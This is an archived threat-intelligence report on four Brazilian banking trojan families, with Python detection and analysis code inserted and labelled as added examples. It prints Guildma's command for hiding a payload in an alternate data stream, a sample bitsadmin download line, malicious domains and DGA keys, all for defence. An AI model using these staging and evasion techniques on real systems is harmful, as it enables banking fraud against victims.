{
	"id": "77b8e619-dcc7-481e-9fa5-b99d0d3bca02",
	"created_at": "2026-04-06T00:21:41.720124Z",
	"updated_at": "2026-04-10T03:35:59.518352Z",
	"deleted_at": null,
	"sha1_hash": "fd6f09453f5aba5c76dc2c38a4842e8baaedd9bb",
	"title": "The Tetrade: Brazilian banking malware goes global",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1107884,
	"plain_text": "The Tetrade: Brazilian banking malware goes global\r\nBy GReAT\r\nPublished: 2020-07-14 · Archived: 2026-04-05 18:24:13 UTC\r\nIntroduction\r\nBrazil is a well-known country with plenty of banking trojans developed by local crooks. The Brazilian criminal\r\nunderground is home to some of the world’s busiest and most creative perpetrators of cybercrime. Like their counterparts’ in\r\nChina and Russia, their cyberattacks have a strong local flavor, and for a long time, they limited their attacks to the\r\ncustomers of local banks. But the time has come when they aggressively expand their attacks and operations abroad,\r\ntargeting other countries and banks. The Tetrade is our designation for four large banking trojan families created, developed\r\nand spread by Brazilian crooks, but now on a global level.\r\nAlthough this is not their first attempt – they tried, timidly, in 2011, using very basic trojans, with a low success rate – now\r\nthe situation is completely different. Brazilian banking trojans have evolved greatly, with hackers adopting techniques for\r\nbypassing detection, creating highly modular and obfuscated malware, and using a very complex execution flow, which\r\nmakes analysis a painful, tricky process.\r\nAt least since the year 2000, Brazilian banks have operated in a very hostile online environment full of fraud. 
Despite their early adoption of technologies aimed at protecting the customer, and the deployment of plugins, tokens, e-tokens, two-factor authentication, chip-and-PIN credit cards and other ways to safeguard their millions of clients, fraud is still ramping up, as the country still lacks proper legislation for punishing cybercriminals.\r\nThis article is a deep dive intended to give a complete understanding of these four banking trojan families: Guildma, Javali, Melcoz and Grandoreiro, as they expand abroad, targeting users not just in Brazil but in the wider Latin America and Europe.\r\nThese crooks are prepared to take on the world. Are the financial system and security analysts ready to deal with this persistent avalanche?\r\nGuildma: full of tricks\r\nAlso known as: Astaroth\r\nFirst seen: 2015\r\nTricks: LOLBins and NTFS Alternate Data Streams (ADS), process hollowing, payloads hosted within YouTube and Facebook posts\r\nReady to steal data from victims living in: Chile, Uruguay, Peru, Ecuador, Colombia, China, Europe\r\nConfirmed victims in: Brazil\r\nThe Guildma malware has been active since at least 2015, when it targeted banking users exclusively in Brazil. Since then it has been constantly updated, adding new targets, new features and stealthiness to its campaigns, and directing its attacks at other countries in Latin America. The group behind the attacks has shown good knowledge of legitimate tools, using them to build a complex execution flow that hides the malware inside the host system and prevents automated analysis systems from tracking its activities.\r\nRecently, a newer version was found in the wild, abusing NTFS Alternate Data Streams (ADS) to store the content of malicious payloads downloaded during execution. 
The malware is highly modular, with a very complex execution flow.\r\nhttps://securelist.com/the-tetrade-brazilian-banking-malware/97779/\r\nPage 1 of 17\r\nThe main vector used by the group is malicious files in compressed format, attached to email. File types vary from VBS to LNK; the most recent campaign started attaching an HTML file that executes JavaScript to download a malicious file.\r\nThe malware relies on anti-debugging, anti-virtualization and anti-emulation tricks, besides the use of process hollowing, living-off-the-land binaries (LOLBins) and NTFS Alternate Data Streams to store downloaded payloads that come from cloud hosting services such as Cloudflare Workers and Amazon AWS, and also from popular websites like YouTube and Facebook, where the C2 information is stored.\r\nFrom LNK to a full banking backdoor\r\nGuildma’s spreading relies heavily on email shots containing a malicious file in compressed format, attached to the email body. File types vary from Visual Basic Script to LNK. Most of the phishing messages emulate business requests, packages sent over courier services or other regular corporate subjects, including the COVID-19 pandemic, but always with a corporate appearance.\r\nPurchase invoice for alcohol gel: Guildma’s trick for luring victims\r\nWe observed that at the beginning of November 2019, another layer was added to the infection chain. Instead of attaching a compressed file directly to the email body, the attackers were attaching an HTML file that executed JavaScript to download the file.\r\nJavaScript executed in order to download a compressed LNK file\r\nIn order to download the additional modules, the malware uses the BITSAdmin tool, which this group has relied on for some years to avoid detection, since this is an allowlisted tool that ships with the Windows operating system. 
By the end of September 2019, we started seeing a new version of Guildma being distributed that used a new technique for storing downloaded payloads in NTFS Alternate Data Streams in order to conceal their presence in the system.\r\nc:\\windows\\system32\\cmd.exe /c type “c:\\users\\public\\Libraries\\radm\\koddsuffyi.gif” \u003e “c:\\users\\public\\Libraries\\radm\\desktop.ini:koddsuffyi.gif” \u0026\u0026 erase “c:\\users\\public\\Libraries\\radm\\koddsuffyi.gif”\r\nDownloaded payload being stored in desktop.ini’s ADS\r\nThe use of ADS helps to hide the file in the system, since the stream does not appear in Explorer or in a plain directory listing. To see alternate data streams, use the DIR command with the /R switch, which is specifically intended for displaying them.\r\nPayloads stored in the ADS data of desktop.ini\r\nAfter the additional modules are hidden, the malware launches itself by using DLL search order hijacking. We have observed various processes being used by Guildma at this step; in this version of the malware it uses ExtExport.exe, which is part of Internet Explorer. The library that is loaded is the result of concatenating two previously downloaded files (\u003crandom\u003e64a.dll and \u003crandom\u003e64b.dll), as can be seen in the image above. The resulting file is given the name of one of the known libraries that ExtExport loads on execution. Once loaded, it concatenates three other files and loads them as well.\r\nSome of the anti-debugging/anti-emulation techniques used by the loader\r\nThis stage checks for debugging tools, virtual environments, known Windows product IDs commonly used by sandboxes, common usernames and certain disk serial numbers that are most likely associated with analyst environments detected earlier. 
If none of those indicators is found, the malware decrypts the third stage and executes it using process hollowing, a technique commonly used by malware authors. In this version the payloads are encrypted with the same XOR-based algorithm as in previous versions; however, in this latest version the payload is encrypted twice, with different keys.\r\nFile content is encrypted twice using different keys\r\nIn order to execute the additional modules, the malware uses process hollowing to hide the malicious payload inside an allowlisted process, such as svchost.exe. The payloads are stored encrypted in the filesystem and decrypted in memory as they are executed.\r\nThe final payload installed in the system monitors user activities, such as opened websites and running applications, and checks whether they are on the target list. When a target is detected, the banking module is executed, giving the criminals control over banking transactions.\r\nThis module allows the criminals to perform very specific banking operations, such as:\r\nfull control over page navigation through the use of a VNC-like system,\r\ntoggling a screen overlay,\r\nrequesting SMS tokens,\r\nQR code validation,\r\nrequesting transactions.\r\nThe attacker can essentially perform any financial transaction from the victim’s computer, while avoiding anti-fraud systems that detect banking transactions initiated by suspicious machines.\r\nYouTube and Facebook for C2s\r\nAfter all loading steps, the malware runs in the infected system. It monitors the system, communicates with the C2 server and loads additional modules as requested. 
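The loader chain described above (a BITSAdmin download, the payload staged into an NTFS alternate data stream with cmd.exe, then ExtExport.exe launched from a user-writable directory) leaves traces in process-creation telemetry. The detector below is an added example written for this article, not code from the original report or from Kaspersky. It runs over a handful of constructed command lines modelled on the cmd.exe command shown above; the download URL, the benign control lines and the choice of bitsadmin switches are assumptions, and the ExtExport.exe rule assumes the binary was copied out of its Internet Explorer installation directory, which is how its DLL search order can be hijacked. Windows paths are written with forward slashes in the source and converted, so the listing stays free of backslash escapes.

```python
import shlex

BS = chr(92)   # backslash, the Windows path separator
DQ = chr(34)   # double quote, as cmd.exe writes around quoted paths

def P(path):
    # Constructed paths are written with / and converted to real Windows form.
    return path.replace('/', BS)

def Q(s):
    return DQ + s + DQ

RADM = P('c:/users/public/Libraries/radm')
CMD = P('c:/windows/system32/cmd.exe')

# Constructed process-creation command lines (not real telemetry). The first
# three follow the Guildma stages from the report; the rest are benign controls.
SAMPLE_LOG = [
    CMD + ' /c type ' + Q(RADM + P('/koddsuffyi.gif')) + ' > '
        + Q(RADM + P('/desktop.ini:koddsuffyi.gif')) + ' && erase ' + Q(RADM + P('/koddsuffyi.gif')),
    'bitsadmin.exe /transfer upd /download /priority high http://files.example/koddsuffyi.gif '
        + RADM + P('/koddsuffyi.gif'),
    RADM + P('/extexport.exe'),
    CMD + ' /c dir /r ' + RADM,
    Q(P('c:/program files/internet explorer/extexport.exe')),
    CMD + ' /c echo done > ' + P('c:/temp/build.log'),
]

def tokenize(cmd):
    # Lower-case, unify path separators, split on whitespace honouring quotes.
    text = cmd.replace(BS, '/').lower()
    try:
        toks = shlex.split(text, posix=False)
    except ValueError:          # unbalanced quote: fall back to a plain split
        toks = text.split()
    return [t.strip(DQ) for t in toks]

def names_stream(path):
    # file:stream carries a colon in the final path component; a bare drive
    # prefix such as c:file is the only legitimate colon that can appear there.
    last = path.split('/')[-1]
    if '/' not in path and len(last) > 1 and last[1] == ':':
        last = last[2:]
    return ':' in last

def findings(cmd):
    toks = tokenize(cmd)
    if not toks:
        return []
    exe = toks[0].split('/')[-1]
    hits = []
    # 1. Output redirected into an alternate data stream (type src > file:stream)
    for i, t in enumerate(toks):
        if t in ('>', '>>') and i + 1 < len(toks) and names_stream(toks[i + 1]):
            hits.append('ads_write:' + toks[i + 1])
    # 2. The staging source is erased in the same command line
    if hits and any(t in ('erase', 'del') for t in toks):
        hits.append('source_erased')
    # 3. BITSAdmin used as a downloader
    if exe in ('bitsadmin.exe', 'bitsadmin') and any(t in ('/transfer', '/addfile') for t in toks):
        hits.append('bitsadmin_download')
    # 4. ExtExport.exe running from anywhere but its Program Files location
    if exe == 'extexport.exe' and not toks[0].startswith('c:/program files'):
        hits.append('extexport_outside_ie_dir')
    return hits

def scan(lines):
    # One findings list per input line, in input order.
    return [findings(line) for line in lines]

if __name__ == '__main__':
    for line, hits in zip(SAMPLE_LOG, scan(SAMPLE_LOG)):
        print('ALERT' if hits else 'ok   ', hits, line[:70])
```

The ADS rule keys on the redirect target rather than on the word type, so it also fires on echo or copy variants writing into a stream; a stream written through PowerShell or the Win32 API will not show up here and needs file-system telemetry (the DIR /R listing mentioned above, or an EDR that records stream creation) instead.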
\r\nIn the latest versions, it started to store C2 information in encrypted form on YouTube and Facebook pages.\r\nC2 information hosted on a YouTube page\r\nThe newer versions of Guildma found in 2020 use an automated process to generate thousands of URLs daily, mostly abusing generic TLDs. Our systems have been catching more than 200 different URLs per day, such as:\r\n01autogestor.ga\r\n04autogestor.ml\r\n0ff2mft71jarf.gq\r\n2va6v.6pnc3461.ink\r\n4nk7h3s453b019.com.de\r\n64pgrpyxpueoj.ga\r\n6pnc3461.ink\r\n6zs1njbw.ml\r\n7wpinibw.ml\r\n84m4bl423.space\r\n909nu3dx3rgk13.com.de\r\nbantqr8rrm9c11.com.de\r\nevokgtis.gq\r\ng2ha14u2m2xe12.com.de\r\nghcco980m1zy9.org\r\ngurulea8.ml\r\nk8cf0j5u.cf\r\nkaligodfrey.casa\r\nkfgkqnf5.cf\r\nnfiru.xyz\r\nosieofcorizon.fun\r\npaiuew.bnorp.ml\r\npeolplefortalce.gq\r\ntopgear.cf\r\nvenumxmasz.club\r\nvuryza.ga\r\nxufa8hy15.online\r\nxvbe.monster\r\nSome of Guildma’s URLs for downloading malware\r\nOur telemetry shows that detections of Guildma are widespread.\r\nGuildma: widespread globally\r\nThe intended targets of Guildma can be seen in the code: the malware is capable of stealing data from bank customers living in Chile, Uruguay, Peru, Ecuador, Colombia, China, Europe and, of course, Brazil. 
However, this code has been found in just one version of Guildma and has not been implemented in any of the newer versions.\r\nFrom Guildma’s code: possible target countries\r\nJavali: big and furious\r\nFirst seen: 2017\r\nTricks: big files for avoiding detection, DLL sideloading, configuration settings hosted in Google Docs\r\nConfirmed victims in: Brazil and Mexico\r\nJavali targets Portuguese- and Spanish-speaking countries. It has been active since November 2017 and primarily focuses on the customers of financial institutions located in Brazil and Mexico. Javali uses multistage malware and distributes its initial payload via phishing emails, as an attachment or as a link to a website. These emails include an MSI (Microsoft Installer) file with an embedded Visual Basic Script that downloads the final malicious payload from a remote C2; it also uses DLL sideloading and several layers of obfuscation to hide its malicious activities from analysts and security solutions.\r\nThe initial Microsoft Installer downloader contains an embedded custom action that triggers a Visual Basic Script. The script connects to a remote server and retrieves the second stage of the malware.\r\nUsing MSI’s ‘CustomAction’ events to trigger the execution of the downloader VBS\r\nThe downloaded ZIP package contains several files and a malicious payload that is capable of stealing financial information from the victim. A decompressed package commonly contains a large number of files, including executables that are legitimate but vulnerable to DLL sideloading.\r\nThe contents of a typical Javali .ZIP package, including a 602 MB DLL file\r\nThe legitimate DLL that would be used in this case is roughly 600 KB in size, but here we have an obfuscated library that is over 600 MB. The large size of the file is intended to hamper analysis and detection. 
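Inflated binaries of this kind are usually padded with sections whose raw data is all zeros, and an analyst can measure and strip that padding from the section table alone. The block below is an added example written for this article, not code from the report and not run against Javali’s DLL: it builds a small synthetic PE image (headers plus three sections, one of them entirely zero) so it runs offline, reports how much of each section is trailing zero padding, and rewrites the file with the padding removed and raw pointers repacked. The synthetic image omits the optional header, and the debloated output does not re-align sections to FileAlignment, which is fine for static analysis but not for loading.

```python
import struct

ZERO = bytes([0])
PE_SIG = bytes([0x50, 0x45, 0, 0])       # PE followed by two NUL bytes
SECTION_FMT = '<8sIIIIIIHHI'             # IMAGE_SECTION_HEADER, 40 bytes

def _section_table(data):
    # Returns (table offset, number of sections) from the COFF header.
    e_lfanew = struct.unpack_from('<I', data, 60)[0]
    if data[e_lfanew:e_lfanew + 4] != PE_SIG:
        raise ValueError('not a PE image')
    nsections = struct.unpack_from('<H', data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from('<H', data, e_lfanew + 20)[0]
    return e_lfanew + 24 + opt_size, nsections

def section_report(data):
    # For each section, the raw size on disk and how much of it is trailing zeros.
    table, nsections = _section_table(data)
    report = []
    for i in range(nsections):
        fields = struct.unpack_from(SECTION_FMT, data, table + 40 * i)
        name = fields[0].rstrip(ZERO).decode('ascii', 'replace')
        raw_size, raw_ptr = fields[3], fields[4]
        raw = data[raw_ptr:raw_ptr + raw_size]
        padding = len(raw) - len(raw.rstrip(ZERO))
        report.append({'name': name, 'raw_size': len(raw), 'zero_padding': padding})
    return report

def summarize(data):
    # Whole-file view: padding ratio is the analyst's inflation indicator.
    report = section_report(data)
    total = sum(s['raw_size'] for s in report)
    padding = sum(s['zero_padding'] for s in report)
    return {
        'sections': report,
        'raw_bytes': total,
        'padding_bytes': padding,
        'content_bytes': total - padding,
        'padding_ratio': padding / total if total else 0.0,
        'empty_sections': [s['name'] for s in report
                           if s['raw_size'] and s['zero_padding'] == s['raw_size']],
    }

def debloat(data):
    # Rewrite with trailing zero padding dropped from every section and raw
    # pointers repacked. Virtual sizes and addresses are left untouched.
    table, nsections = _section_table(data)
    ptrs = [struct.unpack_from(SECTION_FMT, data, table + 40 * i)[4] for i in range(nsections)]
    first_raw = min([p for p in ptrs if p] or [table + 40 * nsections])
    out = bytearray(data[:first_raw])      # headers, exactly as they were
    cursor = first_raw
    for i in range(nsections):
        off = table + 40 * i
        fields = list(struct.unpack_from(SECTION_FMT, data, off))
        raw = data[fields[4]:fields[4] + fields[3]].rstrip(ZERO)
        fields[3], fields[4] = len(raw), (cursor if raw else 0)
        struct.pack_into(SECTION_FMT, out, off, *fields)
        out += raw
        cursor += len(raw)
    return bytes(out)

def build_sample():
    # Synthetic image (constructed for this example): no optional header,
    # three sections laid out back to back from file offset 512.
    sections = [
        (b'.text', bytes(range(1, 65))),               # 64 bytes of real content
        (b'.data', bytes(range(1, 17)) + bytes(240)),  # 16 real bytes, 240 of padding
        (b'.rsrc', bytes(4096)),                        # all zero: the inflation
    ]
    e_lfanew, raw_ptr, vaddr, headers = 64, 512, 0x1000, b''
    for name, content in sections:
        headers += struct.pack(SECTION_FMT, name.ljust(8, ZERO), len(content), vaddr,
                               len(content), raw_ptr, 0, 0, 0, 0, 0x60000020)
        raw_ptr += len(content)
        vaddr += 0x1000
    coff = struct.pack('<HHIIIHH', 0x14C, len(sections), 0, 0, 0, 0, 0x2102)
    image = bytes([0x4D, 0x5A]) + bytes(58) + struct.pack('<I', e_lfanew) + PE_SIG + coff + headers
    image += bytes(512 - len(image))
    for _, content in sections:
        image += content
    return image

if __name__ == '__main__':
    img = build_sample()
    print(summarize(img))
    print(len(img), '->', len(debloat(img)), 'bytes after debloating')
```

On a real sample, read the file into bytes and pass it to summarize; a padding ratio close to 1 with one or two huge zero-filled sections is the signature of this trick, and the debloated output is what you hash and upload when the original exceeds a scanner’s size limit.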
\r\nIn addition, file size limitations prevent uploading it to multiscanners like VirusTotal. Once all empty sections have been removed from the library, the final payload is a binary of 27.5 MB.\r\nAfter deobfuscating it all, we are able to see the URLs and the names of the banks targeted by the malware.\r\nJavali after deobfuscation: looking for Mexican bank customers\r\nGDocs for malware\r\nOnce the library is called by one of the triggering events implemented in its code, it reads a configuration file from a shared Google Document. If it is not able to connect to that address, it uses a hardcoded one.\r\nConfiguration settings stored in a shared Google Document\r\nThe original configuration:\r\ninicio{\r\n“host”:”7FF87EF610080973F065CAB4B5B0AA”,\r\n“porta”:”0000”\r\n}fim\r\nThe host information is obfuscated for obvious reasons. Javali adopts a third-party library named IndyProject for communication with the C2. In its most recent campaigns, its operators have also started using YouTube to host C2 information, exactly as Guildma does.\r\nUpon in-depth analysis of the library code, we can see a list of targets in some of the samples. Depending on the sample analyzed, cryptocurrency websites, such as Bittrex, or payment solutions, such as Mercado Pago, a very popular payment platform in Latin America, are also targeted. To capture login credentials from all the previously listed websites, Javali monitors processes to find open browsers or custom banking applications. 
The most common web browsers thus monitored are Mozilla Firefox, Google Chrome, Internet Explorer and Microsoft Edge.\r\nThe victim distribution is mainly concentrated in Brazil, although recent phishing emails demonstrate a marked interest in Mexico.\r\nJavali: focus on Brazil and Mexico\r\nJavali uses allowlisted and signed binaries, Microsoft Installer files and DLL hijacking to infect victims en masse, all while targeting its efforts by country. This is achieved by controlling the means of distribution and sending phishing emails only to the TLDs that the group is interested in. We can expect expansion mainly across Latin America.\r\nMelcoz, a worldwide operator\r\nFirst seen: 2018 (worldwide), but active in Brazil for years\r\nTricks: DLL hijacking, AutoIt loaders, Bitcoin wallet stealing module\r\nConfirmed victims in: Brazil, Chile, Mexico, Spain, Portugal\r\nMelcoz is a banking trojan family developed by a group that has been active in Brazil for years but, since at least 2018, has expanded overseas. Their Eastern European partners heavily inspired the recent attacks. The new operations are professionally executed, scalable and persistent, with various versions of the malware and significant infrastructure improvements that enable cybercriminal groups in different countries to collaborate.\r\nWe found that the group has attacked assets in Chile since 2018 and, more recently, in Mexico. Still, it is highly probable that there are victims in other countries, as some of the targeted banks operate internationally. However, the attacks seem to be focused more on Latin American victims these days. 
As these groups speak different languages (Portuguese and Spanish), we believe that Brazilian cybercriminals are working with local groups of coders and money mules to withdraw the stolen funds, managed by different operators who sell access to the infrastructure and malware builders. Each campaign runs under its own unique ID, which varies between versions and the C2s used.\r\nGenerally, the malware uses AutoIt or VBS scripts added to MSI files, which run malicious DLLs using the DLL hijacking technique, aiming to bypass security solutions. The malware steals passwords from browsers and from memory, and provides remote access for capturing online banking sessions. It also includes a module for stealing Bitcoin wallets: it replaces the original wallet information with the cybercriminals’ own.\r\nYet Another Son of Remote Access PC\r\nMelcoz is another customization of the well-known open-source RAT Remote Access PC, which is available on GitHub, alongside many other versions developed by Brazilian criminals. It first started targeting users in Brazil, but since at least 2018 the group has shown interest in other countries, such as Chile and Mexico. The infection vector used in this attack is a phishing email that contains a link to a downloadable MSI installer, as shown below.\r\nPhishing email written in Spanish\r\nAlmost all of the analyzed MSI samples used some version of Advanced Installer with a VBS script appended to the CustomAction section, which makes the script run during the installation process. The script itself works as a downloader for the additional files needed to load the malware into the system, which are hosted separately as a ZIP package. 
We confirmed two different techniques used for distributing the Melcoz backdoor: an AutoIt loader script and DLL hijacking.\r\nThe official AutoIt3 interpreter comes as part of the AutoIt installation package, and the malware uses it to execute the compiled script. The VBS script runs the AutoIt interpreter, passing the compiled script as an argument. Once executed, the script loads the library, which was also passed as an argument, and calls a hardcoded exported function.\r\nAutoIt script acting as a loader for the malicious DLL\r\nThe other method used to execute the second stage on the victim’s system is DLL hijacking. In this campaign, we have seen vmnat.exe, the legitimate VMware NAT service executable, abused for loading the malicious payload, although the group can use a number of legitimate executables in its attacks.\r\nThe malware has specific features that allow the attackers to perform operations related to online banking transactions, password stealing and clipboard monitoring. We also found various versions of the payload: the version focused on stealing data from victims in Brazil is typically unpacked, while the versions targeting banks in Chile and Mexico are packed with VMProtect or Themida. For us, this is another sign that the operators change their tactics in accordance with their local needs.\r\nAfter initialization, the code monitors browser activity, looking for online banking sessions. Once one is found, the malware enables the attacker to display an overlay window in front of the victim’s browser and manipulate the user’s session in the background. In this way, the fraudulent transaction is performed from the victim’s machine, making it harder to detect for anti-fraud solutions on the bank’s end. 
The criminal can also request specific information asked for during the bank transaction, such as a secondary password or token, bypassing the two-factor authentication solutions adopted by the financial sector.\r\nThe code also has a timer that monitors content saved to the clipboard. Once a match is triggered, the malware checks whether the content is a Bitcoin wallet address and then replaces it with the cybercriminal’s address.\r\nThe attackers rely on compromised legitimate servers, as well as commercial servers they purchased. The compromised servers mostly host samples for attacking victims, whereas the commercial hosting is used for C2 communications. As mentioned earlier, different operators run different campaigns, which explains the different network infrastructures seen so far.\r\nAccording to our telemetry, Melcoz samples have been detected in other Latin American countries and in Europe, mainly in Spain and Portugal.\r\nMelcoz detections worldwide: focus on Brazil, Chile, Spain and Portugal\r\nEl Gran Grandoreiro\r\nFirst seen: 2016\r\nTricks: MaaS, DGA, C2 information stored on Google Sites\r\nConfirmed victims in: Brazil, Mexico, Portugal, Spain\r\nJust like Melcoz and Javali, Grandoreiro started to expand its attacks in Latin America and later in Europe with great success, focusing its efforts on evading detection by using modular installers. Among the four families we describe, Grandoreiro is the most widespread globally. The malware enables attackers to perform fraudulent banking transactions from the victims’ computers, bypassing the security measures used by banking institutions.\r\nWe have observed this campaign since at least 2016, with the attackers improving their techniques regularly, aiming to stay unmonitored and active longer. 
The malware uses a specific Domain Generation Algorithm (DGA) for hiding the C2 address used during the attack; this is one of the key points that has helped in clustering the campaign.\r\nIt is still not possible to link this malware to any specific cybercrime group, although it is clear that the campaign uses a MaaS (Malware-as-a-Service) business model, based on the information collected during the analysis, which showed that many operators were involved.\r\nWhile tracking cybercrime campaigns that targeted Latin America, we found one interesting attack that was very similar to known Brazilian banking malware but had distinctive features relating to the infection vector and the code itself. It was possible to identify two clusters of attacks, the first targeting Brazilian banks and the second aimed at other banks in Latin America and Europe. This is to be expected: many European banks have operations and branches in Latin America, so this is a natural next step for the cybercriminals.\r\nThe cluster targeting Brazil used hacked websites and Google Ads to drive users to download the malicious installer. The campaign targeting other countries used spear-phishing as the delivery method.\r\nFake page driving the user to download the malicious payload\r\nIn most cases, the MSI file executed a function from the embedded DLL, but there were also cases where a VBS script was used in place of the DLL.\r\nMSI containing an action to execute a specific function from the DLL\r\nThe function then downloads an encrypted file containing the final payload used in the campaign. The file is encrypted with a custom XOR-based algorithm, with the key 0x0AE2. 
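The XOR-based payload encryption mentioned here for Grandoreiro and earlier for Guildma (where the payload is XORed twice with different keys) shares one weakness: repeating-key XOR is linear, so two layers collapse into a single equivalent key, and any known plaintext, such as the MZ header or the DOS stub text of a PE payload, reveals the key bytes directly. The block below is an added example written for this article, not code from the report and not the malware’s own routine. It treats 0x0AE2 as a two-byte repeating key, which is an assumption, since the report describes the algorithm only as XOR-based, and it uses a constructed stand-in for a PE payload so it runs offline.

```python
from math import gcd

MZ = bytes([0x4D, 0x5A])                                  # PE files start with MZ
DOS_STUB = b'This program cannot be run in DOS mode.'      # usual text at offset 0x40
GRANDOREIRO_KEY = bytes([0x0A, 0xE2])   # 0x0AE2 read as a 2-byte repeating key (assumption)

def xor_repeating(data, key):
    # Rolling XOR with a repeating key; XOR is its own inverse, so this
    # function both encrypts and decrypts.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def combined_key(k1, k2):
    # Two repeating-key XOR layers equal one layer whose key is k1 XOR k2
    # stretched over lcm(len(k1), len(k2)) bytes, regardless of layer order.
    n = len(k1) * len(k2) // gcd(len(k1), len(k2))
    return bytes(k1[i % len(k1)] ^ k2[i % len(k2)] for i in range(n))

def recover_key(ciphertext, known_plaintext, key_len, offset=0):
    # Known-plaintext attack: each known byte at file position p reveals
    # key[p % key_len]. Enough known bytes (>= key_len) yield the whole key.
    key = [None] * key_len
    for i, kp in enumerate(known_plaintext):
        p = offset + i
        key[p % key_len] = ciphertext[p] ^ kp
    if any(k is None for k in key):
        raise ValueError('not enough known plaintext for this key length')
    return bytes(key)

def sample_payload():
    # Constructed stand-in for a PE payload: MZ, zeroed DOS header fields,
    # the DOS stub text at offset 64, then filler bytes.
    return MZ + bytes(62) + DOS_STUB + bytes(range(256)) * 4

def demo():
    pt = sample_payload()
    # Guildma-style double layer with keys of different lengths (3 and 4)
    k1 = bytes([0x5A, 0x13, 0xC7])
    k2 = bytes([0x01, 0x02, 0x03, 0x04])
    two_layer = xor_repeating(xor_repeating(pt, k1), k2)
    merged = combined_key(k1, k2)
    # Grandoreiro-style single layer with the assumed 2-byte key
    ct = xor_repeating(pt, GRANDOREIRO_KEY)
    return {
        'combined_len': len(merged),
        'two_layer_undone': xor_repeating(two_layer, merged) == pt,
        'stub_recovered': recover_key(two_layer, DOS_STUB, 12, 64) == merged,
        'recovered': recover_key(ct, MZ, 2),
        'decrypted_ok': xor_repeating(ct, recover_key(ct, MZ, 2)) == pt,
    }

if __name__ == '__main__':
    for name, value in demo().items():
        print(name, value)
```

In practice the key length is unknown; try candidate lengths in increasing order and accept the first one for which the decrypted bytes start with MZ and contain the DOS stub text, which is exactly the check recover_key plus xor_repeating performs for one candidate.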
\r\nIn the latest versions, the authors moved from encryption to using a base64-encoded ZIP file.\r\nThe main module is in charge of monitoring all browser activity, looking for any actions related to online banking. As we analyzed the campaign, we identified two clusters of activity: the first mainly focused on Brazilian targets and the second focused more on international targets.\r\nThe code suggests that the campaign is being managed by various operators. The sample build specifies an operator ID, which is used to select the C2 server to contact.\r\nCode used to generate the URL based on the operator ID\r\nThe code above calculates the path to a Google Sites page containing information about the C2 server to be used by the malware. The algorithm uses a key that is specific to the operator as well as the current date, which means that the URL changes daily.\r\nID | Operator | Key | Date | Generated path\r\n01 | zemad | jkABCDEefghiHIa4567JKLMN3UVWpqrst2Z89PQRSTbuvwxyzXYFG01cdOlmno | 16Mar0 | zemadhjui3\r\n02 | rici | jkABCDEefghFG01cdOlmnopqrst2Z89PQRiHIa4567JKLMN3UVWXYSTbuvwxyz | 16Mar0 | ricigms0rqf\r\n03 | breza | 01cdOlmnopqrst2Z89PQRSTbuvwxjkABCDEefghiHIa4567JKLMN3UVWXYFGyz | 16Mar0 | brezasqvtub\r\n04 | grl2 | mDEefghiHIa4567JKLMNnopqrst2Z89PQRSTbuv01cdOlwxjkABC3UVWXYFGyz | 16Mar0 | grl25ns6rqh\r\n05 | rox2 | 567JKLMNnopqrst2Z89PQmDEefghiHIa4RSTbuv01cdOlwxjkABC3UVWXYFGyz | 16Mar0 | rox2rpfseen\r\n06 | mrb | 567JKLMNnopqrst2Z89PQmDEefghiHIa4RSTbuv01cdOlwxjkABC3UVWXYFGyz | 16Mar0 | mrbrpfseen\r\n07 | ER | jkABCDEefghiHIa4567JKLMN3UVWXYFG01cdOlmnopqrst2Z89PQRSTbuvwxyz | 16Mar0 | erhjui3nf8\r\nThe generated path is then contacted in order to get information about the C2 server to be used for execution.\r\nC2 information stored on Google Sites\r\nThe operator controls infected machines by using a custom tool. 
The tool notifies the operator when the victim is available and enables the operator to perform a number of activities on the machine, such as:\r\nrequesting information needed for the banking transaction, such as an SMS token or QR code;\r\nallowing full remote access to the machine;\r\nblocking access to the bank website: this feature helps to prevent the victim from learning that funds were transferred from their account.\r\nDGA and Google Sites\r\nThe campaign uses commercial hosting sites in its attacks. In many cases, they use a very specific web server named HFS, or HTTP File Server, for hosting encrypted payloads. One can note a small change on the displayed page, which shows “Infects” instead of “Hits” as on the default page.\r\nHFS used for hosting the encrypted payloads\r\nThose hosting sites are disposable. Each is used for a short time before the operators move on to another server. We have seen Grandoreiro use DGA functions to generate a connection to a Google Sites page storing C2 information.\r\nAs for the victims, analysis of the samples confirms that the campaign targets Brazil, Mexico, Spain and Portugal. However, it is highly possible that other countries are also affected, since the targeted institutions have operations in other countries as well.\r\nGrandoreiro: focus on Brazil, Portugal and Spain\r\nConclusions\r\nGuildma, Javali, Melcoz and Grandoreiro are examples of yet another Brazilian banking group/operation that has decided to expand its attacks abroad, targeting banks in other countries. 
They benefit from the fact that many banks operating in Brazil also have operations elsewhere in Latin America and Europe, making it easy to extend their attacks to the customers of these financial institutions.\r\nBrazilian crooks are rapidly creating an ecosystem of affiliates, recruiting cybercriminals to work with in other countries, adopting MaaS (malware-as-a-service) and quickly adding new techniques to their malware as a way to keep it relevant and financially attractive to their partners. They are certainly leading the creation of this type of threat in Latin America, mainly because they need local partners to manage the stolen money and to help with translation, as most of them are not native Spanish speakers. This professional approach draws a lot of inspiration from ZeuS, SpyEye and other big banking trojans of the past.\r\nAs a threat, these banking trojan families try to innovate by using DGAs, encrypted payloads, process hollowing, DLL hijacking, a lot of LOLBins, fileless infections and other tricks as a way of obstructing analysis and detection. We believe that these threats will evolve to target more banks in more countries. We know they are not the only ones doing this, as other families of the same origin have already made a similar transition, possibly inspired by the success of their “competitors”. This seems to be a trend among Brazilian malware developers that is here to stay.\r\nWe recommend that financial institutions watch these threats closely, while improving their authentication processes, boosting anti-fraud technology and threat intel data, and trying to understand and mitigate such risks. 
All the details, IoCs, Yara rules and hashes of these threats are available to the users of our Financial Threat Intel services.\r\nMD5\r\nGuildma\r\n0219ef20ab2df29b9b29f8407cf74f1c\r\n0931a26d44f0e7d70fda9ef86ee203f4\r\nJavali\r\n5ce1eb8065acad5b59288b5662936f5d\r\n91b271e7bfe64566de562a8dd2145ac6\r\nMelcoz\r\n4194162fe30a3dca6d8568e72c71ed2d\r\naeaf7355604685d4d753d21902ff1c1c\r\nc63b4eb3067d8cb5f2d576bc0777e87d\r\nGrandoreiro\r\n071d3d6404826c24188dc37872224b3d\r\n1b50b1e375244ce5d4e690cf0dbc96d8\r\nSource: https://securelist.com/the-tetrade-brazilian-banking-malware/97779/",
	"extraction_quality": 1,
